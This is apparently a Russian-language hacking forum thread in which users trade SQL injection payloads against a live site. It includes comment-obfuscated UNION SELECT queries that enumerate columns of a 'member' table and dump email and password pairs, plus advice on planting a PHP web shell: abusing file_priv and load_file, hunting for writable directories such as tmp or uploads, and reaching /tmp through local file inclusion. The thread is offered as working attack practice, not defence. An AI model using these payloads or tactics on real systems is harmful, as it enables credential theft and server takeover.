Iceangel_ & pinch

не катит (

вот интересно information_schema.columns работает а information_schema.tables не работает

брутил имя таблицы "member"

и вот такой запрос получилось

id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,column_name,4+from+/*!information_schema.columns*/+/*!where*/+/*!table_name*/=/*!CHAR*/(109,101,109,98,101,114)

...

Hasta la vista baby

id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,aes_decrypt(aes_encrypt(concat(Email,0x3a,Pas sword),1),1),4+from+/*!member*/

есть sql, хочу создать пхп файл

1. file_priv=Y
2. magic_quotes_gpc=off
3. есть полный путь
4. есть папка icons

читаю файлики с помощью load_file, но создать файл не выходит в чем может быть проблема?

pinch

a в папке icons есть права на запись?

видимо нет=))) что можно сделать, поискать папки на запись? или можно еще чтото сделать?

первый вариант, смотри на папки типа template

pinch, посканьте сайт каким-нить сканером директорий, затем методом тыка поищите каталог на запись

pinch посмотри если сайт на кмс построен, соответсвенно скачай и посмотри какие папки есть и пробуй всe, ну и конечно пробуй папки: store, tmp,temp,img,im,admin,adm,cache,images,upl,uploads ........etc... если в них нет ограничений по исполнению в .htaccess

pinch

если система linux то попробуй записать в папке /tmp
думаю права хватит

tmp хорошо, но никак не задействовать допустим шелл из этой папки... если не ошибаюсь только при помощи локального инклуда.